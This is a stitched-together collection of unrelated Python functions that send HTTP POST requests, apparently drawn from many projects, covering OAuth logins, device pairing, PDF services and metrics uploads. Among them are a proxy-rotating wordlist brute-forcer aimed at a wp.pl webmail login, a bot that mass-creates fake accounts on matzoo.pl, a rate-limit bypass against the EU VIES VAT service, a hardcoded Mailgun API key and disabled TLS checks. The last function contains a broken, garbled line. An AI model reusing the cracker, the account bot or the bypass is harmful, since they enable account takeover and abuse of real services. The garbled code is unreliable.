def _get_png_preview_or_overlaid_pdf(url, data, notification_id, json=True): if json: resp = requests_post( url, json=data, headers={ 'Authorization': 'Token {}'.format( current_app.config['TEMPLATE_PREVIEW_API_KEY']) }) else: resp = requests_post( url, data=data, headers={ 'Authorization': 'Token {}'.format( current_app.config['TEMPLATE_PREVIEW_API_KEY']) }) if resp.status_code != 200: raise InvalidRequest( 'Error generating preview letter for {} Status code: {} {}'.format( notification_id, resp.status_code, resp.content), status_code=500) return base64.b64encode(resp.content).decode('utf-8')
def login_github(): at_response = requests_post( 'https://github.com/login/oauth/access_token', data={ 'client_id': app.github_oauth_client_id, 'client_secret': app.github_oauth_client_secret, 'code': request.args['code'], 'accept': 'application/json' } ) assert at_response.status_code == 200 response_data = url_decode(at_response.text) access_token = response_data['access_token'] user_response = requests_get('https://api.github.com/user', params={'access_token': access_token}) assert user_response.status_code == 200 user_data = user_response.json() try: login = session.query(GithubLogin).filter_by( uid=user_data['login'] ).one() except NoResultFound: login = GithubLogin(user=User(), uid=user_data['login']) login.user.display_name = login.identifier() session.add(login) session.commit() login_user(login.user) return redirect(url_for('pages.index'))
def auth(self): print("Registering HueBridge...") # Send API request data = {'devicetype': 'wooferbot'} url = "http://{}:80/api".format(self.ip) result = requests_post(url, data=json_dumps(data), timeout=5) if result.status_code == 200: output_json = result.json() i = -1 for items in output_json: i = i + 1 # Authorization requires hardware confirmation if 'error' in items: error_type = output_json[i]['error']['type'] if error_type == 101: print("Error: Press link button and try again") return False # Authorization successful if 'success' in items: self.token = output_json[i]['success']['username'] print("Authorized successfully") return True # General error print("Error connecting") return False
def get_access_token(clientId: str, clientSecret: str, refreshToken: str) -> str: print("Refreshing access token") start_time = time.time() r = requests_post( "https://www.googleapis.com/oauth2/v4/token", headers={"Accept": "application/json"}, data={ "client_id": clientId, "client_secret": clientSecret, "refresh_token": refreshToken, "grant_type": "refresh_token", }, ) if r.status_code != 200: print("\nGet token failed:") print(r.status_code) print(r.data, "\n") return None rjson = r.json() token = rjson["access_token"] expiration = start_time + rjson["expires_in"] print(f"Got access token: {token[:15]}[...]") return token, expiration
def get_letters_pdf(template, contact_block, filename, values): template_for_letter_print = { "subject": template.subject, "content": template.content, } data = { "letter_contact_block": contact_block, "template": template_for_letter_print, "values": values, "filename": filename, } resp = requests_post( "{}/print.pdf".format(current_app.config["TEMPLATE_PREVIEW_API_HOST"]), json=data, headers={ "Authorization": "Token {}".format(current_app.config["TEMPLATE_PREVIEW_API_KEY"]) }, ) resp.raise_for_status() pages_per_sheet = 2 billable_units = math.ceil( int(resp.headers.get("X-pdf-page-count", 0)) / pages_per_sheet) return resp.content, billable_units
def _post_xml(scanner_ip, xml): resp = requests_post('http://{0}/eSCL/ScanJobs'.format(scanner_ip), data=xml, headers={'Content-Type': 'text/xml'}) if resp.status_code == 201: return '{0}/NextDocument'.format(resp.headers['Location']), 201 return resp.reason, resp.status_code
def make_shorten_url(self, longUrl=None, idx=None): if self.shorten_url: return self.shorten_url headers = {'content-type': 'application/json'} from base.google import get_api_key api_key = get_api_key(idx) api_url = 'https://www.googleapis.com/urlshortener/v1/url?key=%s' % api_key if not longUrl: longUrl = self.ui_url # TODO : 테스트를 위해 거시기한 구조의 구현이 되어 있음. 개선 longUrl = longUrl.replace('http://192.168.1.2:8000/', 'http://phopl.com/') longUrl = longUrl.replace('http://192.168.1.3:8000/', 'http://phopl.com/') data = '{"longUrl": "%s"}' % longUrl try: r = requests_post(api_url, headers=headers, data=data, timeout=60) except: return None if not r.status_code == status.HTTP_200_OK: return None d = json_loads(r.content) if not d or 'id' not in d or not d['id']: return None shorten_url = d['id'] self.shorten_url = shorten_url self.save() return shorten_url
def optimize(self, spec): query_url = 'http://127.0.0.1:{}/process'.format(self.port) try: return requests_post(query_url, data=json_dumps(spec)).json() except ValueError: raise Exception( 'No JSON object could be decoded from API response.')
def get_letters_pdf(template, contact_block, filename, values): template_for_letter_print = { "subject": template.subject, "content": template.content } data = { 'letter_contact_block': contact_block, 'template': template_for_letter_print, 'values': values, 'filename': filename, } resp = requests_post( '{}/print.pdf'.format(current_app.config['TEMPLATE_PREVIEW_API_HOST']), json=data, headers={ 'Authorization': 'Token {}'.format(current_app.config['TEMPLATE_PREVIEW_API_KEY']) }) resp.raise_for_status() pages_per_sheet = 2 billable_units = math.ceil( int(resp.headers.get("X-pdf-page-count", 0)) / pages_per_sheet) return resp.content, billable_units
def auth(self): self.settings.log("Registering HueBridge...") # Send API request data = {"devicetype": "wooferbot"} url = "http://{}:80/api".format(self.ip) result = requests_post(url, data=json_dumps(data), timeout=5) if result.status_code == 200: output_json = result.json() i = -1 for items in output_json: i = i + 1 # Authorization requires hardware confirmation if "error" in items: error_type = output_json[i]["error"]["type"] if error_type == 101: self.settings.log( "Error: Press link button and try again") return False # Authorization successful if "success" in items: self.token = output_json[i]["success"]["username"] self.settings.log("Authorized successfully") return True # General error self.settings.log("Error connecting") return False
def UploadFile(self, original_filename, filedata): url = self._base_url + '/cgi/upload/' log('Request: POST ' + url) # files = {'file': (original_filename, filedata)} # r = requests_post(url, files=files) # NOTE: requests library has bad support for # upload files with utf-8 names # It encodes utf-8 file name in the following form: # filename*=utf-8\'\'%D1%80%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9.%D1%84%D0%B0%D0%B9%D0%BB # This is why I'm constructing multipart message manually boundary = b'Ab522e64be24449aa3131245da23b3yZ' encoded_filename = original_filename.encode('utf-8') payload = b'--' + boundary + b'\r\nContent-Disposition: form-data' \ + b'; name="file"; filename="' + encoded_filename \ + b'"\r\n\r\n' + filedata + b'\r\n--' + boundary + b'--\r\n' content_type = 'multipart/form-data; boundary=' \ + boundary.decode('utf-8') headers = {'Content-Type': content_type} r = requests_post(url, data=payload, headers=headers) self.CheckHttpError(r)
def post(self, bypass_ratelimit: bool = False): # bypass_ratelimit is a switch to bypass the 1 minute API ban after sending the same data twice # API returns valid=False correctly for invalid requests, even when ratelimited # The idea is to exploit this behaviour by first sending the invalid request for the same country, # making sure that server returned the correct valid=False response, # and then continuing to check the real VAT ID, considering ratelimit error as success headers = {'Content-type': 'text/xml'} xml_request = '' \ '<?xml version="1.0" encoding="UTF-8"?>' \ '<SOAP-ENV:Envelope ' \ 'xmlns:ns0="urn:ec.europa.eu:taxud:vies:services:checkVat:types" ' \ 'xmlns:ns1="http://schemas.xmlsoap.org/soap/envelope/" ' \ 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">' \ '<SOAP-ENV:Header/>' \ '<ns1:Body>' \ '<ns0:checkVat>' \ '<ns0:countryCode>%s</ns0:countryCode>' \ '<ns0:vatNumber>%s</ns0:vatNumber>' \ '</ns0:checkVat>' \ '</ns1:Body>' \ '</SOAP-ENV:Envelope>' self.data = xml_request % (self.country_code, self.vat_id) if bypass_ratelimit: data = xml_request % (self.country_code, '1337') self.response = requests_post(url=self.url, data=data, headers=headers, timeout=self.timeout) self.validate() if self.error: return # The server is down, do not try to send the real request self.response = requests_post(url=self.url, data=self.data, headers=headers, timeout=self.timeout) self.validate(bypass_ratelimit)
def __call__(self, data): response = requests_post(self._api_url, headers={'Content-Type': data['type']}, data=data['content']) response.raise_for_status() return { 'filename': change_ext(data['filename'], None, '.xml'), 'content': response.text, 'type': response.headers['Content-Type'] }
def lambda_handler(event, context): # Inst some objects price_list = [] n = 0 while True: # Run until monday 21st may if datetime.datetime.now().day > 20: break print("[INFO] Scheduler has been running for {} cycles".format(n)) # Shuffle through multiple bots if required for bot in bots: inner_list = [] # Iterate over all requests to each bot for line in lines: # Build and make request payload = json_dumps({"message": "@" + bot + " " + line }) #convert dict to str response = requests_post(URL, data=payload) # do post # Process request print(response.json()["message"]) #a = dict((k, response.json()[k]) for k in ["timestamp","message"]) # just extact timestamp and message #inner_list.append(a) #collect the responses in a list # Send to hut34 Firebase #params = json_dumps({"botid":"cryptobot"}) payload = response.json() payload["botid"] = "cryptobot" payload = json_dumps(payload) r = requests_post(STREAM, headers=auth, params=payload) #, data = payload) print(r.json() ) #["firebase_key"]) #print firebase key to confirm #price_list = price_list + inner_list #join the lists together time.sleep(60) #wait for 1 min
def get_token(code): payload = { "client_id": Oauth.client_id, "client_secret": Oauth.client_secret, "grant_type": "authorization_code", "code": code, "redirect_uri": Oauth.redirect_url, "scope": Oauth.scope } headers = {"Content-Type": "application/x-www-form-urlencoded"} access_token = requests_post( url=Oauth.discord_token_url, data=payload, headers=headers).json().get("access_token") return access_token
def send_email(to, title, msg): from requests import post as requests_post from rest_framework import status to_name = to.split('@')[0] data = { 'from': '사진 공유 서비스 포플(PHOPL) <*****@*****.**>', 'to': '%s <%s>' % (to_name, to), 'subject': title, 'text': msg } r = requests_post('https://api.mailgun.net/v3/maukistudio.com/messages', auth=('api', 'key-1b25db28c7b404487efb45adc1aaf953'), data=data) return r.status_code == status.HTTP_200_OK
def download_job_sid(self, sid, mode='json', filename=None): """ Wrapper for streaming results to a file instead of through sockets with the API. :param sid: sid of job :param mode: json, csv, or xml :return: local filename, False if failure """ # Only tested on 6.3, may need to mod this job_sid_url = 'https://{0}/en-US/api/search/jobs/{1}/results?isDownload=true&' \ 'timeFormat=%25FT%25T.%25Q%25%3Az&maxLines=0&count=0&filename=&outputMode={2}' \ '&spl_ctrl-limit=unlimited&spl_ctrl-count=50000'.format(self.host, sid, mode) if not filename: filename= '{0}.{1}'.format(sid, mode) cookie_builder = {} for l in self._auth_headers: for x in l[1].split('; '): q = x.split('=') cookie_builder[q[0]] = q[1] r = requests_get(job_sid_url, stream=True, cookies=cookie_builder, verify=False) cnt = 0 with open(filename, 'wb') as f: # I have the bandwidth to do this size, you may not. for chunk in r.iter_content(chunk_size=1024*1024*1024): if chunk: f.write(chunk) cnt += 1 if cnt % 1000 == 0: # Call control occasionally to keep the export stream alive requests_post(r'https://{0}/en-US/splunkd/__raw/services/search/jobs/{1}/control' .format(self.host, sid), data={ 'output_mode': mode, 'action': 'touch' }, cookies=cookie_builder, verify=False) return filename
def getToken(self, video_config): headers = video_config.get('auth_config').get('headers') headers.update( dict(Authorization=b64decode(headers.get('Authorization')))) data = dict(fileReference=video_config.get('id'), v='1', originatorHandle=video_config.get('originator_handle')) if video_config.get('user_token_required'): data.update(dict(userToken=self.plugin.get_setting('user_token'))) res = requests_post(video_config.get('auth_config').get('url'), headers=headers, data=data) if res.status_code == 200: video_config.update(dict(token=res.text[1:-1])) return video_config
def _sanitise_precompiled_pdf(self, notification, precompiled_pdf): try: response = requests_post( '{}/precompiled/sanitise'.format( current_app.config['TEMPLATE_PREVIEW_API_HOST']), data=precompiled_pdf, headers={ 'Authorization': 'Token {}'.format( current_app.config['TEMPLATE_PREVIEW_API_KEY']), 'Service-ID': str(notification.service_id), 'Notification-ID': str(notification.id) }) response.raise_for_status() return response.json(), "validation_passed" except RequestException as ex: if ex.response is not None and ex.response.status_code == 400: message = "sanitise_precompiled_pdf validation error for notification: {}. ".format( notification.id) if response.json().get("message"): message += response.json()["message"] if response.json().get("invalid_pages"): message += ( " on pages: " + ", ".join(map(str, response.json()["invalid_pages"]))) current_app.logger.info(message) return response.json(), "validation_failed" try: current_app.logger.exception( "sanitise_precompiled_pdf failed for notification: {}".format( notification.id)) self.retry(queue=QueueNames.RETRY) except MaxRetriesExceededError: current_app.logger.error( "RETRY FAILED: sanitise_precompiled_pdf failed for notification {}" .format(notification.id), ) notification.status = NOTIFICATION_TECHNICAL_FAILURE dao_update_notification(notification) raise
def register_images(): from pks.settings import SERVER_HOST auth_token = { 'auth_user_token': AUTH_USER_TOKEN, 'auth_vd_token': AUTH_VD_TOKEN } for file_name in glob('%s/*.jpg' % IMAGE_PREPARED_PATH): with open(file_name, 'rb') as f: files = {'file': f} response = requests_post('%s/rfs/' % SERVER_HOST, files=files, data=auth_token) if response.status_code != status.HTTP_201_CREATED: print(response.text) print(file_name) print('------------------------------') #break continue
def bot(id): global args, locks, proxies, accounts while True: try: with locks[0]: if len(proxies) == 0: proxies.extend(get_proxies()) proxy = choice(proxies) proxies.remove(proxy) log('[INFO][%d] Connecting to %s' % (id, proxy)) user_agent = get_random_string(30, 100) log('[INFO][%d] Setting user agent to %s' % (id, user_agent)) email = '%s@%s.com' % (get_random_string( 8, 500), get_random_string(8, 500)) log('[INFO][%d] Setting email to %s' % (id, email)) password = get_random_string(8, 500) log('[INFO][%d] Setting password to %s' % (id, password)) response = requests_post('http://matzoo.pl/rejestracja', data={ 'email1': email, 'email2': email, 'password1': password, 'password2': password, 'regulamin': '1', 'zgoda': '1', 'newsletter': '1', 'kod': 'cztery' }, headers={'User-Agent': user_agent}, proxies={'http': proxy}, timeout=10) if b'UDA\xc5\x81O SI\xc4\x98!' in response.content: with locks[1]: accounts.write('%s\t%s\n' % (email, password)) accounts.flush() logv('[INFO][%d] Successfully created account' % id) else: logv('[INFO][%d] Could not create account' % id) except RequestException as e: log('[WARNING][%d] %s' % (id, e.__class__.__name__)) except KeyboardInterrupt: exit(0) except: exit(1)
def auth(self): print("Auth with nanoleaf...") # Send API request url = "http://{}:16021/api/v1/new".format(self.ip) result = requests_post(url) # Authorization successful if result.status_code == 200: print("Authorized ok") self.token = result.json()['auth_token'] return True # Authorization requires hardware confirmation if result.status_code == 403: print("Nanoleaf not in discovery mode.") print( "Hold down power button for ~5 seconds until led starts blinking." ) return False
def login(self, silence=False): data = self.credential.get_credentials() res = requests_post('https://auth.sport.sky.de/login', data=dict(user=data.get('user'), pin=data.get('password'))) if res.status_code == 200: self.credential.set_credentials(data.get('user'), data.get('password')) user_token = res.text[1:-1] self.plugin.set_setting('user_token', user_token) self.plugin.set_setting('login_acc', data.get('user')) token_payload = json_loads( self.plugin.b64dec(user_token.split('.')[1])) self.plugin.set_setting('booked_packages', ','.join(token_payload.get('packages'))) self.plugin.set_setting('token_exp', str(token_payload.get('exp'))) if silence == False: self.plugin.dialog_notification('Anmeldung erfolgreich') else: self.plugin.dialog_notification('Anmeldung nicht erfolgreich')
async def challonge_here(command, msg, user, channel, *args, **kwargs): here_parts = {} # Stores active participants # if not enough arguments, we end early if not msg: raise Exception(bold("Challonge_Here") + ": Not enough arguments. Please provide a user to checkin.") async with channel.typing(): parts, tour_url = await start_challonge(command, msg, channel, kwargs['guild']) # Get all the participants and the tournament URL for part in parts: # Grab every participant and get the useful information (display name and id number) here_parts.update({part['participant']['display_name'].lower():part['participant']['id']}) # Check to make sure that participant exists in tourney try: checkin_id = str(here_parts[msg.lower()]) except KeyError: # Tell the messenger that the user is not in the tournament raise Exception(bold("Challonge_Here") + ": Lizard-BOT cannot find {0} in the tournament.".format(bold(msg))) # Send the check in request to Challonge checkin_post = requests_post(base_url + tour_url + "/participants/" + checkin_id +"/check_in.json", headers={"User-Agent":"Lizard-BOT"}, auth=(chal_user, api_key)) # Check to make sure we get a good response if '200' in str(checkin_post.status_code): # Good response. Return that the score was updated return "Checked in: {0}".format(bold(msg)) elif '401' in str(checkin_post.status_code): # Permission error raise Exception(bold("Challonge_Here") + ": Lizard-BOT does not have access to the tournament") elif '422' in str(checkin_post.status_code): # Checkin period not running raise Exception(bold("Challonge_Here") + ": The check-in window hasn't started or is over for the tournament") else: # Some other challonge error. Print it to console and error with appropriate message print(checkin_post.text) raise Exception(bold("Challonge_Here") + ": Unknown Challonge error for <" + tour_url + "> while checking in: " + msg) # Message showing who is not checked in and who is not in the Discord return
def _sanitise_precompiled_pdf(self, notification, precompiled_pdf): try: response = requests_post( "{}/precompiled/sanitise".format( current_app.config["TEMPLATE_PREVIEW_API_HOST"]), data=precompiled_pdf, headers={ "Authorization": "Token {}".format( current_app.config["TEMPLATE_PREVIEW_API_KEY"]), "Service-ID": str(notification.service_id), "Notification-ID": str(notification.id), }, ) response.raise_for_status() return response except RequestException as ex: if ex.response is not None and ex.response.status_code == 400: message = "sanitise_precompiled_pdf validation error for notification: {}. ".format( notification.id) if "message" in response.json(): message += response.json()["message"] current_app.logger.info(message) return None try: current_app.logger.exception( "sanitise_precompiled_pdf failed for notification: {}".format( notification.id)) self.retry(queue=QueueNames.RETRY) except MaxRetriesExceededError: current_app.logger.error( "RETRY FAILED: sanitise_precompiled_pdf failed for notification {}" .format(notification.id), ) notification.status = NOTIFICATION_TECHNICAL_FAILURE dao_update_notification(notification) raise
def bot(id): global args, locks, proxies, wordlist while True: with locks[1]: try: password = next(wordlist).strip() except: break log('[INFO][%d] Setting password to %s' % (id, password)) while True: try: with locks[0]: if len(proxies) == 0: proxies.extend(get_proxies()) proxy = choice(proxies) proxies.remove(proxy) log('[INFO][%d] Connecting to %s' % (id, proxy)) response = requests_post('https://poczta.wp.pl/login/v1/token', params={'zaloguj': 'poczta'}, data={ 'login_username': args.email, 'password': password }, proxies={'https': proxy}, timeout=10, allow_redirects=False) if len(response.cookies): logv('[INFO][%d] Successfully cracked password: %s' % (id, password)) exit(0) else: logv('[INFO][%d] Invalid password: %s' % (id, password)) break except (RequestException, SSLError) as e: log('[WARNING][%d] %s' % (id, e.__class__.__name__)) except KeyboardInterrupt: exit(0) except: exit(1)
def UploadText(self, title, text): url = self._base_url + '/cgi/addtext/' log('Request: POST ' + url) formdata = {'title': title, 'body': text} r = requests_post(url, data=formdata) self.CheckHttpError(r)
def post(model, *args, **kwargs): url = model.url auth = HTTPDigestAuth(model.auth_username, model.auth_password) payload = {'args': args} response = requests_post(url, data=payload, auth=auth, timeout=None) return response.status_code
except Exception as error: sys_exit(f'{error}') for i in range(0, config["nb_smartplug"]): ip_smartplug = str(ipaddressIPv4(config["smartplugs"][i])) smartplugs.append(SmartPlug(ip_smartplug)) while True: for smartplug in smartplugs: try: data = "" smartplug_data = smartplug.info smartplug_data.update(smartplug.emeter_stats()) data = f'hs110 mac="{smartplug_data["mac"]}",version="{smartplug_data["sw_ver"]}",name="{smartplug_data["alias"]}",state={smartplug_data["relay_state"]},voltage_mv={smartplug_data["voltage_mv"]},current_ma={smartplug_data["current_ma"]},power_mw={smartplug_data["power_mw"]},total_wh={smartplug_data["total_wh"]}\n' r = requests_post(config["influxdb"]["url"] + '/write', data=data, params={ 'db': config["influxdb"]["database"], 'u': config["influxdb"]["username"], 'p': config["influxdb"]["password"] }) if r.status_code != 204: logger.error( f'Error can\'t send data to InfluxDB URL --> {config["influxdb"]["url"]}\nHTTP Error code --> {r.status_code}' ) else: logger.info(f'{data}') except Exception as error: logger.error(f'{error}') time_sleep(config["delay"])
def RemoveFile(self, url_filename): url = self._base_url + '/cgi/remove/' log('Request: POST ' + url) formdata = {'fileName': url_filename} r = requests_post(url, data=formdata) self.CheckHttpError(r)
def RemoveAllFiles(self): url = self._base_url + '/cgi/remove-all/' log('Request: POST ' + url) r = requests_post(url, data='') self.CheckHttpError(r)
def hash_rows(stop_flag): latest_hashed = get_last_sent_id() print(latest_hashed) have_new_rows = True hashed_rows = 0 model = get_vehicle_model() serializer = get_vehicle_serializer() while not stop_flag[0] and have_new_rows: latest_id = get_latest_id(model) new_rows = get_new_rows(model, latest_hashed, settings.max_size_hashed_batch) records = [] if not len(new_rows): have_new_rows = False for new_row in new_rows: if new_row['vin'] is None: continue if len(new_row['vin']) > 17: continue # if new_row['create_date'] > datetime.now() - timedelta(days=3): # continue if not re.match(r'^[a-zA-Z0-9\-]+$', new_row['vin']): continue latest_hashed = new_row[settings.vehicle_model_primary_key] hashed_rows += 1 records.append({ 'uuid': new_row[settings.vehicle_model_primary_key], 'vin': new_row[settings.vehicle_model_vin_key], 'standard_version': settings.vindb_hash_functions, 'hash': hash_functions[settings.vindb_hash_functions]( serializer(new_row)) }) if len(records): blockchain = VinChain(node=settings.vinchain_node, blocking=True, debug=False, known_chains={ 'VIN': { 'chain_id': settings.vinchain_chain_id, 'core_symbol': 'VIN', 'prefix': 'VIN' }, }) blockchain.wallet.unlock(settings.vinchain_wallet_password) payload = { 'signature': blockchain.get_message( datetime.now().strftime('%Y-%m-%dT%H:%M:%S')).sign( settings.vindb_hasher if settings. vindb_use_hasher else settings.vindb_data_source), 'data_source': settings.vindb_data_source, 'hashes': records } if settings.vindb_use_hasher: payload['hasher'] = settings.vindb_hasher start_time = time.time() response = requests_post( '{}/vindb/vin_records/create/'.format(settings.vindb_host), data=json_dumps(payload), headers={'Content-Type': 'application/json'}, timeout=120) extra = { 'data_source': settings.vindb_data_source, 'hash_functions': settings.vindb_hash_functions, 'latest_hashed_id': latest_hashed, 'latest_id': latest_id, 'success': response.status_code == 201, } if response.status_code != 201: # error extra['result'] = json_dumps({ 'status_code': response.status_code, 'response': response.text }), _logger.error( '%s: %d rows processed unsuccessfully (ids %s-%s). Status code: %s. Error: "%s"', settings.app_name, len(records), records[0]['uuid'], records[-1]['uuid'], response.status_code, response.text, extra=extra) raise Exception( 'Rows have not been stored in DB. Status code: {}. Error: "{}"' .format(response.status_code, response.text)) # success hashed_records = response.json()['records'] # check if all records stored in DB rs = len(hashed_records) == len(records) extra.update({ 'success': rs, 'hashed_rows': len(hashed_records), 'hashed_rows_ids': [r['uuid'] for r in hashed_records], 'tried_hash_rows_ids': [r['uuid'] for r in records] if not rs else None, 'result': json_dumps({'status_code': response.status_code}), }) if rs: _logger.info('%s: %d rows processed successfully (ids %s-%s)', settings.app_name, len(hashed_records), hashed_records[0]['uuid'], hashed_records[-1]['uuid'], extra=extra) else: if len(hashed_records): _logger.info( '%s: %d of %d rows processed successfully (ids %s-%s)', settings.app_name, len(hashed_records), len(records), hashed_records[0]['uuid'], hashed_records[-1]['uuid'], extra=extra) # _logger.error('%s: Not all rows have been stored in DB. ' # 'Only %d from %d rows processed successfully (ids %s-%s)', # settings.app_name, len(hashed_records), len(records), # hashed_records[0]['uuid'], hashed_records[-1]['uuid'], extra=extra) # raise Exception('Not all rows have been created. Status code: {}. Hashed rows ids: "{}". ' # 'Tried to hash rows ids: "{}"'.format(response.status_code, extra['hashed_rows_ids'], # extra['tried_hash_rows_ids'])) _logger.info('--- %s seconds ---', (time.time() - start_time), extra=extra) return hashed_rows
def download_card(bar: tqdm, cardinfo): card_item = ("", "") try: # Retrieve file ID and face from function argument file_id = cardinfo[0] file_face = cardinfo[3] # Attempt to retrieve the filename from function argument (XML) try: filename = cardinfo[2] # this is pretty f*****g stupid but if it works it works if filename == "": raise IndexError except IndexError: # Can't retrieve filename from argument (XML) - retrieve it from a google app query instead # Credit to https://tanaikech.github.io/2017/03/20/download-files-without-authorization-from-google-drive/ # use the results with a 'with' statement to avoid issues w/ connection broken try: with requests_post( "https://script.google.com/macros/s/AKfycbw90rkocSdppkEuyVdsTuZNslrhd5zNT3XMgfucNMM1JjhLl-Q/exec", data={"id": file_id}, timeout=30, ) as r_info: filename = r_info.json()["name"] except requests_Timeout: # Failed to retrieve image name - add it to error queue print("cant get filename so gonna exih") q_error.put( f"Failed to retrieve filename for image with ID {TEXT_BOLD}{file_id}{TEXT_END} >" ) # in the case of file name request failing, filepath will be referenced before assignment unless we do this filepath = "" if filename: # Split the filename on extension and add in the ID as well # The filename with and without the ID in parentheses is checked for, so if the user downloads the image from # Google Drive without modifying the filename, it should work as expected # However, looking for the file with the ID in parentheses is preferred because it eliminates the possibility # of filename clashes between different images filename_split = filename.rsplit(".", 1) filename_id = filename_split[0] + " (" + file_id + ")." + filename_split[1] # Filepath from filename # TODO: os.path.join? filepath = cards_folder + "/" + filename if not os.path.isfile(filepath) or os.path.getsize(filepath) <= 0: # The filepath without ID in parentheses doesn't exist - change the filepath to contain the ID instead filepath = cards_folder + "/" + filename_id # Download the image if it doesn't exist, or if it does exist but it's empty if (not os.path.isfile(filepath)) or os.path.getsize(filepath) <= 0: # Google script request for file contents # Set the request's timeout to 30 seconds, so if the server decides to not respond, we can # move on without stopping the whole autofill process )) > 0 and text_to_list(cardinfo[1])[0] > 10: try: # Five attempts at downloading the image, in case the api returns an empty image for whatever reason attempt_counter = 0 image_downloaded = False while attempt_counter < 5 and not image_downloaded: with requests_post( "https://script.google.com/macros/s/AKfycbzzCWc2x3tfQU1Zp45LB1P19FNZE-4njwzfKT5_Rx399h-5dELZWyvf/exec", data={"id": file_id}, timeout=120, ) as r_contents: # Check if the response returned any data filecontents = r_contents.json()["result"] if len(filecontents) > 0: # Download the image f = open(filepath, "bw") f.write(np_array(filecontents, dtype=np_uint8)) f.close() image_downloaded = True else: attempt_counter += 1 if not image_downloaded: # Tried to download image three times and never got any data, add to error queue q_error.put( f"{TEXT_BOLD}{filename}{TEXT_END}:\n https://drive.google.com/uc?id={file_id}&export=download" ) except requests_Timeout: # Failed to download image because of a timeout error - add it to error queue q_error.put( f"{TEXT_BOLD}{filename}{TEXT_END}:\n https://drive.google.com/uc?id={file_id}&export=download" ) # Same check as before - if, after we've tried to download the image, the file doesn't exist or is empty, # or we couldn't retrieve the filename, we'll add it to an error queue and move on # We also decide on what to stick onto the queue here - error'd cards still go onto the queue to avoid # counting issues, but they're put on as empty strings so the main thread knows to skip them if os.path.isfile(filepath) and os.path.getsize(filepath) > 0 and filename: # Cards are normally put onto the queue as tuples of the image filepath and slots card_item = (filepath, text_to_list(cardinfo[1])) except Exception as e: # Really wanna put the nail in the coffin of stalling when an error occurs during image downloads # Any uncaught exceptions just get ignored and the card is skipped, adding the empty entry onto the appropriate queue # print("encountered an unexpected error <{}>".format(e)) q_error.put(f"https://drive.google.com/uc?id={file_id}&export=download") # Add to the appropriate queue if file_face == "front": q_front.put(card_item) elif file_face == "back": q_back.put(card_item) elif file_face == "cardback": q_cardback.put(card_item) # Increment progress bar bar.update(1)